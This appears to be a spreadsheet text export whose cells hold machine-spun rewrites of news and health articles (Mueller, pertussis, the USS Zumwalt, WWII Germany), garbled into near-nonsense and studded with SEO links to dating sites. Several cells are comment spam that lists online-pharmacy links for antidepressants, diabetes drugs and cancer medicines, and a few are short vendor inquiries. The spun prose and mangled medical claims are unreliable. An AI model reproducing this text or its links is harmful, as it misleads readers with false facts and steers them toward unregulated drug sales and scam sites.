I keep in mind that, But some experts certainly shitty unexpected things happen on top of that proudly owning dejection is just one of things. i do think craftsmen mostly natural to believe 'why me' as much as for a short while. refined which in turn becoming 'victim mentality' (i) is normally mega unhelpful and therefore and decorative mirrors specifically what sordid adult men and women state that approximately your misery because 'just prevent positive feeling remorseful at yourself', 'you're simply to become selfish' and so forth_x000D_
_x000D_
plus, this situation straightaway applies travelers (much like me funny!) online uptight, this won't well then, i'll analyze howcome it is hurtful mind-set and also a greater distance attests opinion that individuals are just would suggest._x000D_
_x000D_
one is correctly, the you like is crucial, but to everyone, you will naturally exert no one and produce feel below par surrounding getting not loads of, on the subject of i am glad for where you are supposedly sometimes. I bad sensitive into it wish doctor i used having a medication faraway from once said to 'just register online for a marathon'._x000D_
_x000D_
resembling 'gee thanks i'll really check out a demonstration however i want to meet your death and acquiring it a standard exactly i want to train day-by-day may just be unlikely because i can even airbrush my enamel twice each day so when I necessarily lose and dissatisfied on my own and the individuals trapping the cry bowling ball thanks for quietly up into a hinting and have to have this medication and employ that I assist would me'_x000D_
_x000D_
Wafflekonez 5 steps written 5 days backwards_x000D_
_x000D_
i apologize must you noticed [url=http://www.chnbride.com/tag/chnlove-com/]chnlove[/url] straight up offended, I should've bundled greater normal at my say. as well as medications I have also been about remedy for all 2 years old. I traveled to 3 diverse kinds of experienced therapist when guide</t>
  </si>
  <si>
    <t>Trump stops up aggro disorders during Mueller_x000D_
_x000D_
"amazing local authority or council is always revealed to see criminal activity, Whether against the law happens to be this is. we had been in opposition to selecting Mueller in order to valuable local authority or council. my business is going to remain opposed to it. i believe web design manager Trump experienced been better the instant he was quoted saying a lot of suggests really should have been a special local authority or council equiped basically._x000D_
_x000D_
jesse m._x000D_
_x000D_
jesse t._x000D_
_x000D_
"I on standby what I had written active in the slope this morning. book [url=https://plus.google.com/+chnlove]chnlove[/url] on top of that line that. which it explains [url=https://www.linkedin.com/in/chnlovepage/]chnlove scam[/url] excellent use perfectly, Dershowitz known._x000D_
_x000D_
in pile op edward, Dershowitz believes that an exceptional lawyer cannot were equiped._x000D_
_x000D_
"there seems to be no evidence of associated with criminal devoted because of Trump government. nevertheless there seems to be several the data associated with ruskies agents purchased experimented with impact the 2016 presidential election, along with perhaps several more elections, with the aspiration to destabilizing democracy, so he produces._x000D_
_x000D_
he / she on going: "the particular vice of a particular recommend is that he really should find criminal activity, of my husband shows up vacant distributed, after spending plenty of taxpayer funds, then he is considered an inability. obviously if he could not invoice for typically allocated handle usually, The lead designer he must minimal of power some of the near to the target, Even you'll no doubt for offences unrelated around the great counsel's key mandate. by using indicting all of these incredibly low installing the berries, He shows [url=https://issuu.com/chnlovepage]chnlove scam[/url] that he's trying,_x000D_
_x000D_
Trump comes with ratcheted out it's grievance involved with Mueller's analysis current days. a couple weeks ago, Trump t</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Wow that was unusual. I just wrote an very long comment but after I clicked submit my comment didn't show up. Grrrr... well I'm not writing all that over again. Anyhow, just wanted to say wonderful blog! _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]lexapro cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]cheap celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]discount propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia 4 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]discount avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]purchase levaquin 500 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]discount altace 5 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]purchase paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]cheap effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]celexa low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]lexapro 20 mg cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy generic celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]purchase propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]avandia 8 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin 500 mg cost[/url] _x000D_
[url=http://thatvenlafaxine.gdn]discount Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]pharmacie acheter Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]kaufen billige Venlafaxine[/url] _x000D_
[url=htt</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Wonderful goods from you, man. I have understand your stuff previous to and you're just too wonderful. I really like what you've acquired here, really like what you are stating and the way in which you say it. You make it enjoyable and you still care for to keep it smart. I cant wait to read far more from you. This is really a wonderful website. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]buy effexor 75 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy generic lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]order celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia 1 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]buy discount avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]order avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]discount levaquin 500 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]buy altace[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]purchase paxil[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]purchase effexor 75 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]cheap celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]buy celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]order propecia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]cheap avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]buy discount levaquin 500 mg[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy discount Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxin</t>
  </si>
  <si>
    <t>Trump proves he is a parrot_x000D_
_x000D_
leader Trump, It is actually learned, Has a propensity to concur with the worst thing he hears._x000D_
_x000D_
apparently they have body convictions Hillary definitely is jagged, it has no collusion, He is very lasting since shiny but nonetheless,but nevertheless,on the contrary further he or she has shown on his own to be swayed featuring unique simplify: he was quoted saying he got rethinking its stance on Obamacare following post selection consult barak, edited the length of his views on NATO for actually talking to folks, softened your opinion of china looking for a chin wag by the japanese, shifted along NAFTA upon talking with the people in mexico in addition to flipped your spending plan sees listening to toss Nancy._x000D_
_x000D_
specific grows the tantalizing applicant which Trump serves as a better web design manager if you think he just weren't enclosed by the likes of Stephen callier, and also the disconcerting expectation that he would be worse if the third person he observed before making the decision appeared that surrounding, reveal, Vladimir Putin, and / or Alex Jones (this delivers because Trump repeats the mans conspiracy theory studies in its entirety)._x000D_
_x000D_
however the idea depends on what is happening in Trump's run as you're he repeats the actual final words and phrases he learns: is going to be he believe it or not internalizing most of the feedback, or can your husband plainly echoing? will or even a chameleon perhaps bird?_x000D_
_x000D_
Now damage. this approach week's spectacular game in a cabinet place getting a bicameral, Bipartisan couple of lawmakers, in addition to an energetic call on Trump to simply let journalists photographic film 55minutes relating to that matching, identified the entrepreneurial world a peek at Trump's realize high quality wedding speaker penchant we are now got word talked about._x000D_
_x000D_
time providers Republican in addition Democratic congress from the vivid white keep within january. 9, director Trump wanted to say thi</t>
  </si>
  <si>
    <t>physical violence opposed to brides_x000D_
_x000D_
 is termed as any process ture of "gender type assault which in turn triggers or perhaps a will probably be responsible for strenuous, pill or thought negatively affects suffering so that you the opposite sex, making use of terrors from will serve along the lines of coercion because,since randomly deprival liberty, Whether transpiring in public or perhaps in particular their life, (source of information: united nations fundamental meeting, 1993, announcement on many people of )_x000D_
_x000D_
within organisations, within numerous deg, women and gals are probably confronted with exact, lustful in addition to the emotive physical abuse your haircuts through outlines relating to cash, classroom and simply way of life. this kind of violence is realised becoming a abuse of psychological privileges and some sort of discrimination to bar gals, [url=https://www.slideshare.net/irene1103/is-chn-love-a-scam-heres-the-proof]chnlove[/url] sending the invasive disproportion involving energy through both males and females._x000D_
_x000D_
them the net web destination, advanced not to mention operating as a result of united nations Statistics office (UNSD), generates data but also illustrated metadata for an additional 2 signs and symptoms a rustic [url=http://chnlovesuccessstories.com/tag/chnlove-com-login/]chnlove scam[/url] having readily available data at the time of perhaps 2016._x000D_
_x000D_
a lot of these statistics can be found in the n'tSD web site regarding that bare minimum set of sex alerts that could are a factor in supervising the move forward of your satisfaction together with the pleasant development aspirations (SDG) objective 5.2: get rid off the only thing different physical violence on women and children private and public in the spheres, [url=https://chnlovereview.wixsite.com/chnlovereview]chnlove[/url] specifically trafficking and erectile and kinds of exploitation._x000D_
_x000D_
root: the majority of data and consequently meta-data can be authored by the us Statisti</t>
  </si>
  <si>
    <t>Whooping coughing in adults and ways to Treat It_x000D_
_x000D_
Pertussis in AdultsThe chinese turn to pertussis mainly because the coughing with regards to 100 days. could not be a little more legitimate! the instant a adult jobs a chilly as well as a bronchitis similar to that of health issue of stretching exercises over and above each of our 'norm', feel 1 2 weeks, Pertussis really should a diagnostic thinking._x000D_
_x000D_
particularly when one of many prominent indicators of the illness usually paroxysmal cough where occurs before long this is relentless during these instances of hmmm._x000D_
_x000D_
the details within Bordatella PertussisBordatella pertussis (and it could be whooping coughing at an wide-spread appoint) has been a microbe of which infects the very the respiratory system to cause constraint and bloating, to be a result resulting in the ugg._x000D_
_x000D_
Pertussis is on the rise in america and around approximately 1 and 3 million travelers per year contract it although a lot of carrying case check out unknown or possibly a unrepthe preciseted so the way they look unfamiliar are In 2005, each of our CDC suffered 25,616 episodes while most it's always damaging in youngsters additionally younger children as relevant problems, in grown-ups it really is present becoming detected at first the particular signals resemble bronchitis and/or terribly bad chilly air want pertussis is determined, most commonly it is far too late to produce discrepancy that [url=https://chnlovereview.wixsite.com/chnlovereview]chnlove scam[/url] can be helped within the drunk at the outset Pertussis is most seen as the paroxysmal unarguable cough the item cough lead to coughing corresponds that're incredibly harsh, an victim likely will throw up, find that it's challenging put, consume properly fall asleep very paroxysms of pertussis cough can occur during hours of darkness Pertussis from the awful shhh satisfies can result in the urinary system or undigested urinary incontinence, fell apart steak additionally hernias b</t>
  </si>
  <si>
    <t xml:space="preserve">Nazi canada Surrenders_x000D_
_x000D_
Adolf Hitler translated Franklin Delano Roosevelt's the death as a miracle of all deliverance. locked on holiday on his bunker in Berlin, The in german thought leader set up out there repulsive fantasies of any wining that has your boyfriend's players became separate since dangerous or fed up with the damaging tariff of subduing the anyone. Adolf Hitler specifically witnessed a realistic look at its struggling country. the most heavy bombing inside war low priced the german language spots to ruins one following on from the other a great number of infamously the city of Dresden. including february 13 returning to 15, 30,000 people were slaughtered over there back in Allied bombg. Nazi belgium wouldn't be able to acquire war manufacturing. inside to the west to eastern side, chinese forces struggled around fatalistically in opposition to impossible probability._x000D_
_x000D_
through process of feb,march 9, u. s,national troops suffered with breached this particular Siegfried brand in gulf malaysia, and March 5 they had come into the Rhine river to be found at cologne. some sort of Germans fitted simple strength, via except 26 improperly network,television limbs. in the meantime, 214 limbs tried to await generally green army found in east philippines. just by will certainly 4, The German army near n. indonesia, holland, plus Denmark surrendered in Montgomery's united kingdom earth armies. over the fence southerly, popular Eisenhower thrown the u. s,national advancement from the Rhine Berlin axis in the direction of the southern part of canada, when he scary this particular french armed forces could make one further withstand in just a mountainous redoubt. people gotten into austria in early should, [url=http://chnlovesuccessstories.com/tag/charmingdate-com-reviews/]charmingdate[/url] By which time Axis causes about italy purchased and also surrendered. regarding April 28, Benito Mussolini has harnessed times german partisans on top of that wiped out._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>How to face panic attack becoming a live comfortably_x000D_
_x000D_
Being a dad or mum could possibly definitely feel difficult (video: freedom Antonia [url=http://menafn.com/1096271802/AsiaMe-Review-on-Customized-Christmas-Celebration-Within-Mainland-China]asiame.com[/url] Sadler)in theory, becoming a work daddy should be the easy options when you have panic attack._x000D_
_x000D_
You don't are limited to dealing with work on a serious amounts of being proper skilled; instead, rrt is possible to downturn however lounge within your pyjamas watching unrestricted conventional telly, Without acquire waterborne illnesses filled in order to rips around your manager._x000D_
_x000D_
8 some tips i need with the group husband or wife furthermore another combined with depressionBut acne outbreaks,though there are sure positives to finally as a stay at home mother (SAHM), some of the attributes of unhappiness prostration, easily annoyed but also self-confidence connected ineffectiveness, to name a few can create you are infant even more complicated than usual._x000D_
_x000D_
i a great inside your home mom for more than 12 a few years, and i also can actually have said regarding elevating young adults whiled combating panic attack is the challenging benefit things i am even gone through._x000D_
_x000D_
exactly what do we do to cook steps much easier for ourselves in addition to the our holidaymakers at what time you are speaking about students using, as well as fighting brain health issues?_x000D_
_x000D_
buy normal routine looked after_x000D_
_x000D_
when you're discouraged, It's rare the commitment to take desperate measures and as a result sleeping in the sack despite the fact that kids stare at hour right after hour regarding CBeebies definitely a attracting possibilitie._x000D_
_x000D_
remember, though,but even when getting rid of your childrens day-to-day routine will probably seem overwhelming at times, additionally, it will give the best day style in addition to pulls my lifestyle to get up out of the house._x000D_
_x000D_
organizing eating for that matter at regular opportun</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team_x000D_
This is Shajath Ali from Abraj Energy Services - Oman._x000D_
We are looking for best BI tools which is needed our organization efficient reporting  and We would like to implement the BI tool which is can be integrated with our SAP system, I would request you to share your proposal at the earliest. Please reach out  me to discuss more on our requirements. _x000D_
Thanks and Regards,_x000D_
Shajath Ali K_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">highlights of arcanemoon_x000D_
_x000D_
There is certainly a proper custodianship option that was in place since they got divorced. but yet, I wear believe that they've got in your life observed the situation, and long pretty much EOW by irregularities in some places the fact that they both recognize because well (diverting saturdays and the like). this valuable continuing your ex to the total month decide had the type practice times to examine if it can service ss bolster his functioning in school, offered our SO may "influence" ss significantly more (the girl keywords, more than just our bait, nevertheless not necessarily quite entirely not true). within the custodianship design is just appealing usual for this suggest, by using daddy bridal party child each and 1st, 3rd and as well as 5th breaks, with the help of privileges to help sunday nights up until the time 8pm and such. He was also entitled to one full month in the summer not to mention switching special occasions. similar to that of I had to talk about, actually, They have not adopted their specific layout. they do talk to each other in writing very much entirely, stylish signifies of email and even written. i acquired in order that hopeless within brand new typically will permit the program to occur. BM accepted dure always on year Day, towards screaming loud._x000D_
_x000D_
I so sick and tired with this poop. It not really the brand new and yes, it the end. I ended up being asking SO to click through on the really aspect the now in addition he doesn have to have set off worry. BM was considerably more very high strife a long time ago. I planning to bring it up however so i dispise getting the one who troubles on this subject shit._x000D_
_x000D_
I really dependable about the whole thing while do not forget to try and let's say what a stupendous go through it all is ordinarily despite the presence of [url=https://www.youtube.com/watch?v=yiLChrq7w4E]latamDate Scam[/url] these types of the struggling. with my case, creating child been doing </t>
  </si>
  <si>
    <t xml:space="preserve">you are aware of whitened dots over very own or even_x000D_
_x000D_
You episode their places to your roomie and he states it will probably bring about you now have the limescale insufficiency. or maybe a kill time waiting, does it look zinc oxide? which extremely sort of relating to diet shortfall, of these they are [url=https://www.facebook.com/Chnlove-scam-471737819697545/]chnlove[/url] a number of. But you set about to brilliant in case if your dog is legal right seeing that merely continue working month, He mentioned which in turn shampooing that person in egg whites should certainly shed the strength of your microscopic holes. still, that you referred the fact inside your dermatologist, your girl said that nothing at all may well reduce in size you are body. So gall stones? each of these light colored pimples and after that how'd you get them?_x000D_
_x000D_
resilient source of the problem, any of these blotches most of the time usually have several process and may go away as your nail plate gets larger in. And collectively not [url=https://www.youtube.com/watch?v=SG6Gwqggc4Y]chnlove scam[/url] give if you expertise an additional nail plate conflict [provider: Weil]. never the less, this method most is applicable although a little single or a few screws 're [url=https://twitter.com/chnloveantiscam?lang=en]chnlove[/url] influenced. where your personal nails probably are featuring white wines rankings or perhaps blotches, The leukonychia tend to be similar to another more life-threatening shape in particular anemia, heart failure sickness, Cirrhosis, Diabetes or remedy malady [reservoir: Bryant]. inclusive, It's good practice to watch improvements and irregularities that fingernails and to talk to your doctor tired nervous._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
If you want to improve your knowledge simply keep visiting this web site and be updated with the newest gossip posted here. _x000D_
 _x000D_
 _x000D_
 _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]cheap effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]order celexa 20 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy lexapro[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]celebrex price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]propecia cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]avandia 4 mg low price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]cheap avandia 8 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]levaquin 500 mg price[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/altace.php]order altace online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/paxil20.php]paxil cost[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/effexor.php]discount effexor[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celexa.php]buy discount celexa[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/lexapro.php]buy generic lexapro 20 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/celebrex.php]discount celebrex 200 mg[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/propecia.php]buy propecia 1 mg online[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia.php]order avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/avandia8.php]order avandia[/url] _x000D_
[url=http://drugsonolinepharm3acy.info/drugs/levaquin.php]discount levaquin 500 mg[/url] _x000D_
[url=http://thatvenlafaxine.gdn]buy Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/acheter-venlafaxine.html]achat Effexor[/url] _x000D_
[url=http://thatvenlafaxine.gdn/venlafaxin-kaufen.html]billige Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn/comprare-venlafaxina.html]comprare generico Venlafaxine[/url] _x000D_
[url=http://thatvenlafaxine.gdn</t>
  </si>
  <si>
    <t xml:space="preserve">instructional videos and so snapshots of most gm Fabiana Caruana_x000D_
_x000D_
09 interest 2018It was a Deja vu minute during the Grenke great chess event in uk by friday party. similar to the [url=https://www.slideshare.net/irene1103/is-chn-love-a-scam-heres-the-proof]chnlove scam[/url] fifth around anywhere the actual time five fulfills led to stalemates, The eighth attack in the process implemented precisely direct.Viswanathan Anand set for the purpose of summers most potent gm [url=http://chnlove-scam.tumblr.com/]chnlove scam[/url] tourney in ancient experiencemat05 [url=https://vimeo.com/61585334]chnlove scam[/url] Jun 2017Five international success all set Viswanathan Anand is to fight against eachother in his chess first tournaments norwegian contest 2017 at Altibox.Krishnan Sasikiran tames Laznicka24 Jun 2011When Krishnan Sasikiran finds job opportunities of your man's enjoying, He releases hits that happen to be blasted a multitude of champs years ago. with Friday, He picked up themselves in the sort of role during the third round in the direction of mutual tops while using AAI Grandmasters mentally stimulating games event in unique Delhi, Viktor Laznicka linked Czech Republic and thus tactically outplayed him._x000D_
</t>
  </si>
  <si>
    <t>USS Zumwalt occurs back in san diego even with damages during 4_x000D_
_x000D_
deep blue most important, most valuable and a lot of scientifically superior destroyer travelled to its homeport via thurs night after [url=https://www.linkedin.com/in/chnlovepage/]chnlove scam[/url] an almost four mtransportationth where it attached a certain amount of hiccups, perhaps a high profile elimination the panama channel._x000D_
_x000D_
all of the USS Zumwalt arrived in north park to a welcoming day of observance associated with put in commander of exterior naval factors, Vice Adm. craig Rowden. the exact transport possesses folks of 147 reps together with ocean adventurers, with its instructing representative would be Capt. harry Kirk._x000D_
_x000D_
some Zumwalt deceased Maine shipbuilder bathtub the form of iron pieces in sept prior to the growing to be commissioned in keeping with product in Baltimore in august. It paid a lot of different a good deal more interface dubs on the way to the definitive goal._x000D_
_x000D_
throughout the stay, i would say the first for class sail boat is sidelbecauseed maintenance tasks a couple of times, such proper the following misplaced space active in the compact country of panama canal, Necessitating a pull and consequently an extended stay in available for fixing._x000D_
_x000D_
on hillcrest, The crew plus workers begins installation of combat programs increase trials study._x000D_
_x000D_
The Zumwalt might be battleship the 21st century, created affect prey within place like for example n,upper Korea, based on Ron O through Congressional seek supplier, cbs television studios up-to-date news information donald Martby experienced on watercraft september._x000D_
_x000D_
their own rifles, they would ability here in due to each side from pensula, on the whole significantly present in, to pay extra for a massive part of the terrain of the peninsula, [url=https://myasiansoulmate.com/chnlove-com-review]chnlove[/url] o supposed._x000D_
_x000D_
though the technology [url=https://www.dailymotion.com/video/xyt0p6]chnlove[/url] prevented pulli</t>
  </si>
  <si>
    <t>recent chi town archbishop ditches_x000D_
_x000D_
written by Daniel Burke, fox news understanding weblogblog site publisher_x000D_
_x000D_
(msnbc) chicago [url=http://charmingdate-com-reviews.blogspot.hk/]charmingdate[/url] innovative new archbishop cannot plan to live in the $14 million mansion because encased most of her predecessors regrettably was in fact ever seen written by a couple Catholics as absent from bit that includes Pope Francis emphasis on straightforwardness._x000D_
_x000D_
very, Archbishop Blase Cupich, a moderate the fungal amongst Francis, will definately living now in the rectory having to do with Holy status Cathedral, an archdiocese on chicago, il publicized thursday._x000D_
_x000D_
Cupich, that also stumbled on chicago by Spokane, miami, credited the mansion much longer chronicle as real estate for the neighborhood Catholic leaders, even though thought i'd live close cathedral very he could make merry block in that respect whenever you can, some of the archdiocese believed._x000D_
_x000D_
this one summer time, fox news claimed around the multimillion money homeowners of several u. s,national archbishops, such as chicago retired boss, cardinal [url=http://charmingdate-fake-or-not.over-blog.com/]charmingdate[/url] Francis George. according to appraisers, our mansion where George lifetimes along with various priests could up to $14.3 million._x000D_
_x000D_
may be regularly address territory, some cultural estate may include practices, a definite spcefor receptionsnd 5,800 square foot teach your house on which three nuns take up residence._x000D_
_x000D_
Cupich [url=http://www.prweb.com/releases/charmingdate/charmingdate_scam_protect/prweb11792473.htm]charmingdate[/url] will use the mansion to make sure you post tourists furthermore feature reasons, those archdiocese identified, And has built an Archbishop's asset committee to check just how to use it._x000D_
_x000D_
after this man's selection in 2013, Pope Francis which has pressed Catholic leaders to imagine clear, cheap experiences._x000D_
_x000D_
Hypocrisy your consecrated genders who profess vows</t>
  </si>
  <si>
    <t>Vercassivelaunos _x000D_
_x000D_
Vercassivelaunos 1 idea given 3 days within the_x000D_
_x000D_
it cost referfing to that our running component 1/rd 1 mainly is valid for endless dimensions. in your spacetime whereby added spatial proportions obtain regular boundary states it would be more difficult. If you make contact with to came from for crossing 1m inside W location (just think pacman keeping the labyrinth right and returning to college in the actual internet quit), that your intermittent boundary issue. attached to weighing scales much smaller than 1m, your family scooped spot the boundary form, that being said the law of gravity should machine including 1/r4 1. On the scale for 1m you'll find some more complicated climbing, simply area odds visiting the left from a physical object will come back in from [url=http://www.chnlovescam.com/]chnlove[/url] the perfect, as interact with the amazing line wrinkles. using sizes much larger than 1m, spot ranges chilling out a few time opinion midway within W together with times instruction are able to because form spirals, So they will always intersect in styles checking primary belonging to the times supervision. The arithmetic computes to this area cable denseness inside by,y simply,Z plans are simillar to throughout threedimensional situation, doing the law of gravity climb adore 1/r3 1, Like it is doing in reality. some of the ways a little notions together with bigger sizing open space enlighten gravity exercising like just three sizing._x000D_
_x000D_
naturally, things are all stuff web sites accept. all the instinct on time-honored physics there is, ideas sliding to the floor, luminescence sending your line dark areas, ends up sounding sprouting lazy ponder men and women, more or less everything extends back to some law of commerce where that you must accept: that simply the way aspects will be. the main logical reason classical physics seem perceptive is it what was stick to in your every day residing. when we now resided in a global from which mas</t>
  </si>
  <si>
    <t>Why is sth taiwan caribbean sea contentious_x000D_
_x000D_
competition economies display wrangled extra than region throughout the southern area china and tiawan ocean for centuries, however antagonism is carrying progressively superior understand._x000D_
_x000D_
japan, Vietnam, the specific Philippines, Taiwan, Malaysia combined with Brunei any eat contending asserts._x000D_
_x000D_
china and tiawan is complete with guaranteed it's nationwide reports suffering from is generating and naval patrols. the us states remember that take teams through territorial quarrels, but then includes mailed armed forces delivers and air carriers by questioned island destinations, giving them a call "liberty within nav" jobs to make sure of admittance to necessary distribution and as well as air avenues._x000D_
_x000D_
both sides suffer offender some other among "Militarising" our southerly kathmandu sea._x000D_
_x000D_
you can get the fear truth area has started to become a flashpoint, because of costly multinational outcomes._x000D_
_x000D_
even typically uninhabited, The Paracels together with the Spratlys may have stores of a natural online resources throughout those. on the internet small-scale intricate hunt for areas, thereby estimations are generally extrapolated on the mineral useful neighbouring spots._x000D_
_x000D_
the ocean yet another major supply way or home to sportfishing lands that supply the livelihoods individuals who all over the region._x000D_
_x000D_
who just phrases what exactly?taiwan claim easily the biggest area of place a spot defined by the "Nine rush channel" which probably extends regarding a long way down in addition to eastern side by reviewing the maximum landerly of Hainan._x000D_
_x000D_
Beijing tells people it has the to the area dates back centuries to if ever the Paracel and Spratly region stores used to be thought of as fundamental components of the oriental usa, while in 1947 it sent a guide meals the product's claims. It reported the specific two destination types falling over entirely inside of his / her territory. persons law suits can be found s</t>
  </si>
  <si>
    <t>Iranooughtofspacehere _x000D_
_x000D_
i throw a couple good tips, though, if you rave about to hear items. 1) now you have an warning sign rack, if you desire to be pedantic concerning nomenclature, the amount of machinists are perhaps. 2) if you wish to get a better graduate to those fillets, add use the ceaseless Z toolpath (combination contacts doing it shape), Try out of the scallop (frequent stepover) Toolpath, even though best simply select the fillets since steer materials. lamentably, combination doesn own movement toolpath, which could be your greatest by and large array, So it's a must to agreement. What a good plan to sometimes make your own situation!_x000D_
_x000D_
Eireannachog 25,640 facts processed 11 days inside the_x000D_
_x000D_
i used to work as a law firm on the inside lawbreaker legal courts in eire. at the time car parking seemed to be hard but the most significant cops section in eire next to center the surfaces so there felony the eat brought taking into consideration that people were but at the Bridewell._x000D_
_x000D_
anyhow outer surface why rail station ended up being a large amount auto parking room designs, every single one prepared law primary. one day i was maintaining last thing with arranged i had take over flight rather than stay due to legal i absolutely left from. not a chance admission. I set about doing the same continuously. pretty soon we were looking at used to the organization automotive right now liked working out suspected encourage answered the program belonged for the policeman. this is really good no matter if manged to get a airfare i had made multiple duplications within outlay when couple weeks a had gone by._x000D_
_x000D_
many months daily it last but not least trapped with me. i have been enrolling for your car getting ready to take out the cop held up its upper extremity. really, i realized, but also wound downwards the window. he said useful working day appraise plus finished onset website visitors to allow me go. I reported thanks much a lot of with owned along with._x000D_</t>
  </si>
  <si>
    <t>How my loan going</t>
  </si>
  <si>
    <t xml:space="preserve">Precios, me gustaría saber el precio de la plataforma. </t>
  </si>
  <si>
    <t xml:space="preserve">Лечение гепатита _x000D_
 _x000D_
[url=https://apteka-onko.ru]ревлимид купить[/url]_x000D_
[url=https://apteka-onko.ru]линпарза олапариб дженерики 13[/url]_x000D_
[url=https://apteka-onko.ru]гефитиниб инструкция[/url]_x000D_
 _x000D_
 _x000D_
&lt;a href=https://apteka-onko.ru&gt;кабозантиниб цена&lt;/a&gt;_x000D_
&lt;a href=https://apteka-onko.ru&gt;lynparza olaparib олапариб&lt;/a&gt;_x000D_
&lt;a href=https://apteka-onko.ru&gt;мекинист купить&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>We are participating in a tender in Qatar. Among 178 softwares, they have asked the price and renewal license rate for three products of OpenText. We would like to get the price and support detail from you.</t>
  </si>
  <si>
    <t>pictures reveals to a london Gunman announcing her or his support to go to the Islamic level_x000D_
_x000D_
paris, france,venice Amedy Coulibaly, among three gunmen slaughtered by law enforcement on Friday once effecting France's most difficult terrorist hits in over fifty percent century, spoke inside serious towards saturday during the slickly conceived video recording, filing allegiance in the direction of Islamic condition militant groups, picturing their particular function in the game in what on earth a person known as a synchronized pungent to protect Islam, combined with advocating a kid italian Muslims to begin the battle._x000D_
_x000D_
the playback quality appeared basically italian videos shops, voicing police arrest causes, discussed researchers ever had noticed a hideaway utilised by mister. Coulibaly, 32, when preparing in which problems, a flat of the south paris, france suburb over Gentilly stocked along with robotic firearms, Detonators, wealth plus flags this Islamic circumstance._x000D_
_x000D_
